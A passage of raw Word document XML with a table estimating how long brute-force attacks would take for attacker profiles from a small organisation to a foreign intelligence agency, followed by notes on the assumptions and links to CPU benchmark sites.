                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t>(24 CPU Threads Used)</w:t>
                  </w:r>
                  <w:r w:rsidR="00717063">
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> (5.7Ghz)</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="204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1FB07B6" w14:textId="4F4C0A04" w:rsidR="00903D82" w:rsidRPr="00903D82" w:rsidRDefault="00903D82" w:rsidP="00903D82">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717063" w:rsidRPr="00717063">
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t>328320</w:t>
                  </w:r>
                  <w:r w:rsidR="00717063">
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t>0</w:t>
                  </w:r>
                  <w:r w:rsidR="00717063" w:rsidRPr="00717063">
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t>000000</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="27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AA4551D" w14:textId="1AB2CD20" w:rsidR="00717063" w:rsidRDefault="00717063" w:rsidP="00903D82">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00717063">
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t>2.83</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> x 10^26 days</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="06D44502" w14:textId="2B01AF06" w:rsidR="00717063" w:rsidRDefault="00717063" w:rsidP="00903D82">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 xml:space="preserve">Or </w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="7663BA04" w14:textId="1FD4CD04" w:rsidR="00717063" w:rsidRPr="00903D82" w:rsidRDefault="008B59EF" w:rsidP="00903D82">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7.75</w:t>
                  </w:r>
                  <w:r w:rsidR="00717063">
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> x 10^</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t>2</w:t>
                  </w:r>
                  <w:r w:rsidR="00717063">
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t>3 years</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00EB538C" w:rsidRPr="00903D82" w14:paraId="2441821B" w14:textId="77777777" w:rsidTr="000B00DE">
              <w:trPr>
                <w:trHeight w:val="312"/>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A60CC56" w14:textId="77777777"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Small Organisation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E8BD315" w14:textId="27D0E9E5"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w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t>10</w:t>
                  </w:r>
                  <w:r w:rsidRPr="00903D82">
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t>0k</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="169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2E8044D" w14:textId="5795B742" w:rsidR="00EB538C"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Pr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t>10 *(Ryzen 9/ Intel Ultra 9 + RTX2000)</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="552DD6A5" w14:textId="59F9C634" w:rsidR="00EB538C" w:rsidRPr="00903D82" w:rsidRDefault="00EB538C"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 xml:space="preserve"> (24 CPU Threads Used) (5.7Ghz)</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="204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A906842" w14:textId="57B28A2A"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0B00DE" w:rsidRPr="000B00DE">
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t>30283200000000</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="27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23FF8A0" w14:textId="1B32194C" w:rsidR="00EB538C"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0B00DE">
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t>1.128 x 10^25 days</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="36890E56" w14:textId="16C92AE4" w:rsidR="000B00DE" w:rsidRDefault="000B00DE"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Or</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="2E8B5C0F" w14:textId="711CCC7A" w:rsidR="000B00DE" w:rsidRDefault="000B00DE"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3.08 x 10^22 years</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="70FC9087" w14:textId="3CC18540" w:rsidR="000B00DE" w:rsidRPr="00903D82" w:rsidRDefault="000B00DE" w:rsidP="00EB538C">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="000B00DE">
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t>​</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00EB538C" w:rsidRPr="00903D82" w14:paraId="5869EC77" w14:textId="77777777" w:rsidTr="000B00DE">
              <w:trPr>
                <w:trHeight w:val="302"/>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29116A" w14:textId="77777777"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Large Organisation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28DCD8C" w14:textId="394D5092"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w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t>2</w:t>
                  </w:r>
                  <w:r w:rsidRPr="00903D82">
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t>M</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="169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625E6E7" w14:textId="31DF404D" w:rsidR="006576AD" w:rsidRDefault="006576AD"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:2x</w:t>
                  </w:r>
                  <w:r w:rsidR="00EB538C" w:rsidRPr="00903D82">
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t> </w:t>
                  </w:r>
                  <w:r w:rsidRPr="006576AD">
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t>AMD EPYC™ 9355 Processor 32-core</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> (64 Thread)</w:t>
                  </w:r>
                  <w:r w:rsidRPr="006576AD">
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> 3.55GHz 256MB Cache (280W)</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="55135CFC" w14:textId="412EA969" w:rsidR="00EB538C" w:rsidRPr="00903D82" w:rsidRDefault="006576AD"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I</w:t>
                  </w:r>
                  <w:r w:rsidR="003A1FD7">
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t xml:space="preserve">mplemented in a Server Rack </w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="204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2E311B3" w14:textId="3D621B6F"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8B59EF">
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t>9.813 x 10^13 bits per day</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="27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27EB1EA" w14:textId="77777777" w:rsidR="00EB538C"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8B59EF">
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t xml:space="preserve">3.4669 x 10^24 days </w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="2C358B05" w14:textId="77777777" w:rsidR="008B59EF" w:rsidRDefault="008B59EF"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 xml:space="preserve">Or </w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="3C2AFE48" w14:textId="20031B9E" w:rsidR="008B59EF" w:rsidRPr="00903D82" w:rsidRDefault="008B59EF"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9.848 x 10^21</w:t>
                  </w:r>
                  <w:r w:rsidR="00C536AF">
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> years</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00EB538C" w:rsidRPr="00903D82" w14:paraId="060A77BB" w14:textId="77777777" w:rsidTr="000B00DE">
              <w:trPr>
                <w:trHeight w:val="312"/>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2A1890A" w14:textId="77777777"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Large botnet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A132F7B" w14:textId="212BECC0"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F042BF">
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t>$25M</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="169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BA64D4A" w14:textId="38A72311" w:rsidR="00EB538C"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DE490B">
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t>AMD Ryzen 5 5600x 6 Cores (4.7GHz)</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="0D115C6D" w14:textId="1B8A61C0" w:rsidR="00DE490B" w:rsidRPr="00903D82" w:rsidRDefault="00DE490B"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5 Million Devices</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="204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E1373CC" w14:textId="7344F392"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DE490B">
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t>3.384 x 10^18</w:t>
                  </w:r>
                  <w:r w:rsidR="00E05570">
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> bits per day</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="27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01DEE8B" w14:textId="77777777" w:rsidR="00E05570"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E05570">
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t xml:space="preserve">1.005 x 10^20 days </w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="5D21D7D9" w14:textId="77777777" w:rsidR="00E05570" w:rsidRDefault="00E05570"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Or</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="7B4E4DC5" w14:textId="0187B42D" w:rsidR="00E05570" w:rsidRPr="00903D82" w:rsidRDefault="00E05570"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2.753 x 10 ^17 years</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00EB538C" w:rsidRPr="00903D82" w14:paraId="38FA2DDF" w14:textId="77777777" w:rsidTr="000B00DE">
              <w:trPr>
                <w:trHeight w:val="616"/>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A9FE978" w14:textId="77777777"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lastRenderedPageBreak/>
                    <w:t>Professional bitcoin miner</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3CC84B3" w14:textId="0E580B32"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F042BF">
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t>$500M</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="169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6DA4B8A" w14:textId="429A91A9" w:rsidR="00831FB7" w:rsidRDefault="00831FB7" w:rsidP="00831FB7">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w:t>
                  </w:r>
                  <w:r w:rsidR="00EB538C" w:rsidRPr="00831FB7">
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t> </w:t>
                  </w:r>
                  <w:r w:rsidRPr="00831FB7">
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t>Bitmain Antminer S21 XP 270TH/s</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t>) x 5000</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="6F230D41" w14:textId="1B05C16E" w:rsidR="00831FB7" w:rsidRPr="00831FB7" w:rsidRDefault="00831FB7" w:rsidP="00831FB7">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00831FB7">
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> </w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="180B9448" w14:textId="2EC0582C" w:rsidR="00EB538C" w:rsidRPr="00831FB7" w:rsidRDefault="00EB538C" w:rsidP="00EB538C">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="204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F444C0D" w14:textId="5AAD5A71"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831FB7">
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t>1.1664x10^23 bits per day</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="27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DEF7644" w14:textId="77777777" w:rsidR="00EB538C"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B9480E">
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t xml:space="preserve">2.91737x10^15 days </w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="7FCC2517" w14:textId="77777777" w:rsidR="00B9480E" w:rsidRDefault="00B9480E"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 xml:space="preserve">Or </w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="4A26438C" w14:textId="4AFE614E" w:rsidR="00B9480E" w:rsidRPr="00903D82" w:rsidRDefault="00B9480E"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 xml:space="preserve">7.99 x 10^12 </w:t>
                  </w:r>
                  <w:r w:rsidR="000439B8">
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t>years</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00EB538C" w:rsidRPr="00903D82" w14:paraId="4FB4219C" w14:textId="77777777" w:rsidTr="000B00DE">
              <w:trPr>
                <w:trHeight w:val="616"/>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0BE9FF2" w14:textId="77777777"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Foreign Intelligence Agency</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5C0B023F" w14:textId="0B563C97"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98788C">
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t>$2</w:t>
                  </w:r>
                  <w:r w:rsidR="00F042BF">
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t>B</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="1695"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D620421" w14:textId="49A16F42" w:rsidR="00EB538C" w:rsidRPr="00903D82" w:rsidRDefault="00E003A3"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2 x 2 exaflop supercomputing facilities</w:t>
                  </w:r>
                  <w:r w:rsidR="00EB538C" w:rsidRPr="00903D82">
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t> </w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="204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4452647" w14:textId="0A4FA05E"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E003A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t>3.456x10^23 bits/day</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="272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518FD75" w14:textId="77777777" w:rsidR="00E003A3" w:rsidRDefault="00E003A3"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9.846133 x 10^14 days</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="3A41BAE7" w14:textId="77777777" w:rsidR="00E003A3" w:rsidRDefault="00E003A3" w:rsidP="00EB538C">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t>Or</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="0BDA45CB" w14:textId="50F164FC" w:rsidR="00EB538C" w:rsidRPr="00903D82" w:rsidRDefault="00EB538C" w:rsidP="00EB538C">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00903D82">
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t> </w:t>
                  </w:r>
                  <w:r w:rsidR="002A2112">
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t>2.697x10^12</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="34B45DA2" w14:textId="3CB4E1B3" w:rsidR="181B8E52" w:rsidRPr="00ED5F6D" w:rsidRDefault="181B8E52" w:rsidP="00903D82">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="2082"/>
              </w:tabs>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="29A2013A" w14:textId="119056F5" w:rsidR="181B8E52" w:rsidRDefault="00903D82" w:rsidP="181B8E52">
            <w:r>
              <w:t xml:space="preserve">Note: N bits of work requires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bit decisions that need to be completed</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="32B655B6" w14:textId="1944AA9A" w:rsidR="00AC1CEF" w:rsidRDefault="00AC1CEF" w:rsidP="00AC1CEF">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="5"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>Asumming after the office worker that the solo teenage hacker and above are able to make one bit decision per clock cycle.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="045CE5FC" w14:textId="383D9D3F" w:rsidR="00CA4D29" w:rsidRPr="00ED5F6D" w:rsidRDefault="00CA4D29" w:rsidP="00AC1CEF">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="5"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>Assuming brute forcing</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="68C29C7F" w14:textId="56CF32E1" w:rsidR="181B8E52" w:rsidRDefault="181B8E52" w:rsidP="181B8E52"/>
          <w:p w14:paraId="240FD2B7" w14:textId="6C70ECBF" w:rsidR="007C100A" w:rsidRDefault="007C100A" w:rsidP="181B8E52">
            <w:r>
              <w:t>Handy Site:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A3AEA36" w14:textId="026BAFCA" w:rsidR="007C100A" w:rsidRDefault="007C100A" w:rsidP="181B8E52">
            <w:hyperlink r:id="rId17" w:anchor="date" w:history="1">
              <w:r w:rsidRPr="00676B32">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>https://www.cpubenchmark.net/laptop.html#date</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6BBCA2CB" w14:textId="77777777" w:rsidR="007C100A" w:rsidRPr="00ED5F6D" w:rsidRDefault="007C100A" w:rsidP="181B8E52"/>
          <w:p w14:paraId="4B18F8D1" w14:textId="5B938FEE" w:rsidR="181B8E52" w:rsidRPr="004458A6" w:rsidRDefault="004458A6" w:rsidP="181B8E52">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004458A6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>Office Worker:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="68CBD2E9" w14:textId="21D49E7E" w:rsidR="181B8E52" w:rsidRPr="00ED5F6D" w:rsidRDefault="005B73AE" w:rsidP="004458A6">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Most Common CPU according to is the Ryzen 5: </w:t>
            </w:r>
            <w:hyperlink r:id="rId18" w:anchor="cpu-commonality" w:history="1">
              <w:r w:rsidRPr="00676B32">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>https://www.cpubenchmark.net/common_cpus.html#cpu-commonality</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
